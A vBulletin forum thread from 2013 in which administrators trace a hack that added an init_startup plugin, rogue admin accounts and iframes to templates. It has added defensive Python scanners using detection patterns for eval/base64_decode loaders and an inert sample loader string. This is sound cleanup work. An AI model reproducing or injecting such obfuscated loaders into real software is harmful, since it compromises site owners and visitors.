Forum hacked...

  • Zachery
    Former vBulletin Support
    • Jul 2002
    • 59097

    #16
    I'd suggest looking over these two blog posts:
    This guide is for what to do, after you’ve been hacked, exploited, and or defaced. Step 1, Change everything: If you believe, or think your site has

    Getting Started This guide is intended to be a starting point for helping to keep your site safe and secure in the long run. It is not a be-all, end-all guide

    Comment

    • Wayne Luke
      vBulletin Technical Support Lead
      • Aug 2000
      • 74122

      #17
      Originally posted by Jaxo
      Sorry, one more thing.. any idea as to how to reset the password on paid subscriptions?
      I am not sure what you mean. There are no passwords on paid subscriptions.
      Translations provided by Google.

      Wayne Luke
      The Rabid Badger - a vBulletin Cloud demonstration site.
      vBulletin 5 API

      Comment

      • Ion Saliu
        Senior Member
        • Sep 2010
        • 172
        • 4.2.X

        #18
        That repeated IP in your post 37.130.224.22 shows this data:

        Country:
        Netherlands nl

        State/Region:
        Noord-Holland

        City:
        Amsterdam

        If it is NOT your location, then DELETE that IP immediately! I found yet another suspicious IP, this time located in Germany!

        I haven't had serious problems with this new hack-attack. I deleted the /install folder of my forum and deleted suspicious IPs. I also changed my login data, including in /includes/config.php. We can help one another if we make public suspicious IPs and also report them.

        But, then again, it struck me as well as other admins:

        WHAT IF THIS NEW HACK-ATTACK ORIGINATED IN THE VB HOUSE ITSELF (E.G. FORMER DISGRUNTLED EMPLOYEES)?

        Comment

        • Jaxo
          Member
          • Dec 2011
          • 36

          #19
          Originally posted by Wayne Luke

          I am not sure what you mean. There are no passwords on paid subscriptions.

          When I go to paid subscription in my admin panel, no matter what tab I click it asks for a password... Looking at the logs, this seems to be something they were tampering with?

          Comment

          • Wayne Luke
            vBulletin Technical Support Lead
            • Aug 2000
            • 74122

            #20
            Has to be a plugin doing that. You would have to find the plugin and delete it.
            Translations provided by Google.

            Wayne Luke
            The Rabid Badger - a vBulletin Cloud demonstration site.
            vBulletin 5 API

            Comment

            • Jaxo
              Member
              • Dec 2011
              • 36

              #21
              Originally posted by Ion Saliu
              That repeated IP in your post 37.130.224.22 shows this data:

              Country:
              Netherlands nl

              State/Region:
              Noord-Holland

              City:
              Amsterdam

              If it is NOT your location, then DELETE that IP immediately! I found yet another suspicious IP, this time located in Germany!

              I haven't had serious problems with this new hack-attack. I deleted the /install folder of my forum and deleted suspicious IPs. I also changed my login data, including in /includes/config.php. We can help one another if we make public suspicious IPs and also report them.

              But, then again, it struck me as well as other admins:

              WHAT IF THIS NEW HACK-ATTACK ORIGINATED IN THE VB HOUSE ITSELF (E.G. FORMER DISGRUNTLED EMPLOYEES)?

              Have had a bit of a search myself and came up with the same result.. it's originating in the Netherlands.
              37.130.224.22 - IP Tracing and IP Tracking

              Timestamp Confirmation:
              The IP tracer report for 37.130.224.22 was ran at 8:44 PM UTC on September 9, 2013 and the information is provided below if available.


              Think I best have a look and see if it matches any members :?

              Comment

              • Jaxo
                Member
                • Dec 2011
                • 36

                #22
                That didn't work very well... here is the link

                What is my IP address? IP Lookup, IP Location, IP Tracker & IP Tracer. The best IP address tools for free.

                Comment

                • Ion Saliu
                  Senior Member
                  • Sep 2010
                  • 172
                  • 4.2.X

                  #23
                  Originally posted by Ion Saliu
                  That repeated IP in your post 37.130.224.22 shows this data:

                  Country:
                  Netherlands nl

                  State/Region:
                  Noord-Holland

                  City:
                  Amsterdam

                  If it is NOT your location, then DELETE that IP immediately! I found yet another suspicious IP, this time located in Germany!

                  I haven't had serious problems with this new hack-attack. I deleted the /install folder of my forum and deleted suspicious IPs. I also changed my login data, including in /includes/config.php. We can help one another if we make public suspicious IPs and also report them.

                  But, then again, it struck me as well as other admins:

                  WHAT IF THIS NEW HACK-ATTACK ORIGINATED IN THE VB HOUSE ITSELF (E.G. FORMER DISGRUNTLED EMPLOYEES)?
                  One more IP to ban and thus be safer... the IP you posted, axiomaticule:
                  37.130.224.22
                  629334038
                  2582e016.rdns.100tb.com
                  Hosting Services
                  Hosting Services
                  Network sharing device or proxy server
                  Recently reported forum spam source. (2)

                  Country:
                  Netherlands nl

                  State/Region:
                  Noord-Holland

                  City:
                  Amsterdam

                  Comment

                  • Jamsoft
                    Member
                    • Jun 2011
                    • 71

                    #24
                    Originally posted by Wayne Luke
                    Has to be a plugin doing that. You would have to find the plugin and delete it.
                    They may have also overwritten your subscription.php. You should not be challenged with a password there. Check to see if the size of subscription.php is different from what comes in the installation. If so, you cannot trust your files and will need to re-upload. I've seen a TON of sites hit this way.

                    Comment
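An added example, not part of any post in this thread: the check suggested in post #24, extended from file size to SHA-256 hashes so that a same-size overwrite is also caught, and reporting files that are not in the clean package at all. The directory layout, the `ignore` list and the sample files built in `demo()` are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path

def index_tree(root):
    """Map each file's relative path under root to (size, sha256)."""
    root = Path(root)
    out = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            data = p.read_bytes()
            out[p.relative_to(root).as_posix()] = (len(data), hashlib.sha256(data).hexdigest())
    return out

def compare_trees(clean_root, live_root, ignore=("includes/config.php",)):
    """Compare a live install against a clean copy of the same version."""
    clean, live = index_tree(clean_root), index_tree(live_root)
    report = {"modified": [], "missing": [], "extra": []}
    for rel, (size, digest) in clean.items():
        if rel in ignore:
            continue
        if rel not in live:
            report["missing"].append(rel)
        elif live[rel][1] != digest:
            # Second field: would a size-only comparison have caught it?
            report["modified"].append((rel, live[rel][0] != size))
    # Files absent from the clean package deserve a manual look.
    report["extra"] = sorted(r for r in live if r not in clean and r not in ignore)
    return report

def demo():
    """Constructed sample trees; file names and contents are made up."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            (root / "includes").mkdir(parents=True)
            (root / "subscription.php").write_text("<?php // original AAAA\n")
            (root / "index.php").write_text("<?php // index\n")
        # Same length as the original, different content.
        (live / "subscription.php").write_text("<?php // tampered BBBB\n")
        (live / "includes" / "config.php").write_text("<?php // site config\n")
        (live / "includes" / "cache_x.php").write_text("<?php // unexpected\n")
        return compare_trees(clean, live)

if __name__ == "__main__":
    print(demo())
```

In the constructed sample, `subscription.php` is reported as modified even though its size is unchanged, and `includes/cache_x.php` is reported as extra.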

                    • Jaxo
                      Member
                      • Dec 2011
                      • 36

                      #25
                      Ok, so I have disabled all my plugins and the problem persists. I have also overwritten all my files (was running 4.2.0 patch 2 and uploaded 4.2.1) but still have the problem. Any other suggestions?

                      Comment

                      • Jaxo
                        Member
                        • Dec 2011
                        • 36

                        #26
                        I have added this line to my config.php and now have access to the subscriptions section. So it has to be a plugin then? It's strange though that disabling all the plugins does not sort the problem.

                        Comment

                        • Jaxo
                          Member
                          • Dec 2011
                          • 36

                          #27
                          Found it !!!

                          They added this plugin..

                          title - init_startup
                          Hook location - init_startup
                          Plugin PHP code
                          ...'));
                          exit;
                          }
                          Have just disabled it and all seems to be working !

                          Comment

                          • Zachery
                            Former vBulletin Support
                            • Jul 2002
                            • 59097

                            #28
                            Please read the following two blog posts:
                            This guide is for what to do, after you’ve been hacked, exploited, and or defaced. Step 1, Change everything: If you believe, or think your site has


                            Getting Started This guide is intended to be a starting point for helping to keep your site safe and secure in the long run. It is not a be-all, end-all guide


                            Also please see these recent security announcements:

                            vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
                            vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions

                            Comment

                            • LBmtb
                              New Member
                              • Jan 2006
                              • 24

                              #29
                              Major hackage here as well for the last two days. I *think* I've cleaned up the last of it. Similar symptoms... weird admin accounts, crazy plugins, redirects, code being inserted into templates and phrases.

                              Is anybody else here annoyed that we paid decent money for this (relative to other forum solutions) and have had so many security headaches?

                              Comment

                              • rburns
                                Member
                                • Mar 2002
                                • 91
                                • 3.6.x

                                #30
                                I have had the same problem, at 7.30 this morning.

                                I managed to catch and delete most of it, but I have a different page on paid subscriptions now.

                                The username was 30K and the IP was 178.73.207.151 and apparently came from Sweden!

                                They added the plugin stated above, and added URLs to my templates (do a search for .biz or derpina in your templates). They used iframes.

                                I've now found a script in my header at the bottom, I've now got rid of it.

                                Best way I can advise to find all your issues is to go to
                                http://quttera.com and put in a free check, it found everything on my site, and then all I needed to do was search the templates to get rid of it. If I find any more I will let you know here.

                                VB, I am not happy that people are able to do this, I pay to have a site that is safe from these actions.

                                Is there a way to make the system email you every time someone changes something in the Admin CP? Or changes certain things (plugins, users, forums). That way we will see this happening a lot faster and get in to stop it.
                                Last edited by rburns; Tue 10 Sep '13, 12:29am.

                                Comment
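An added example, not code from any poster or from vBulletin: a scan for the two things posts #27 and #30 describe, a plugin on `init_startup` carrying a long encoded string, and templates loading iframes or scripts from other hosts. The row field names (`title`, `hookname`, `phpcode`), the sample rows and the host names are assumptions constructed for illustration; feed it your own export of plugins and templates, disabled plugins included.

```python
import re
from urllib.parse import urlsplit

# PHP calls commonly chained to hide a payload inside a string.
DECODERS = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I)
# A quoted run of base64 characters this long is not hand-written plugin code.
LONG_B64 = re.compile(r"['\"][A-Za-z0-9+/=\s]{200,}['\"]")
EMBED = re.compile(r"<(iframe|script)\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
STARTUP_HOOKS = {"init_startup"}  # the hook named in the thread

def scan_plugin(row):
    """Return the reasons a plugin row looks like an injected loader."""
    code, reasons = row["phpcode"], []
    calls = sorted({c.lower() for c in DECODERS.findall(code)})
    if calls:
        reasons.append("decoder calls: " + ", ".join(calls))
    if LONG_B64.search(code):
        reasons.append("long base64 string literal")
    if row["hookname"] in STARTUP_HOOKS and re.search(r"\bexit\s*;", code):
        reasons.append("exit in startup hook")
    return reasons

def scan_template(html, own_hosts):
    """Return (tag, host) for iframes/scripts loaded from other hosts."""
    hits = []
    for tag, src in EMBED.findall(html):
        host = urlsplit(src).hostname or ""  # relative URLs have no host
        if host and host not in own_hosts:
            hits.append((tag.lower(), host))
    return hits

# Constructed sample data: inert strings, assumed field names, made-up hosts.
SAMPLE_PLUGINS = [
    {"title": "init_startup", "hookname": "init_startup",
     "phpcode": "eval(base64_decode('" + "QUFB" * 80 + "'));\nexit;"},
    {"title": "Welcome box", "hookname": "example_hook",
     "phpcode": "$show['welcome'] = true;"},
]
SAMPLE_TEMPLATE = (
    '<script src="clientscript/vbulletin-core.js"></script>'
    '<iframe src="http://widgets.unknown.example/x" width="1"></iframe>'
)

def run_samples():
    flagged = {p["title"]: scan_plugin(p) for p in SAMPLE_PLUGINS}
    return flagged, scan_template(SAMPLE_TEMPLATE, {"forum.example.com"})

if __name__ == "__main__":
    print(run_samples())
```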
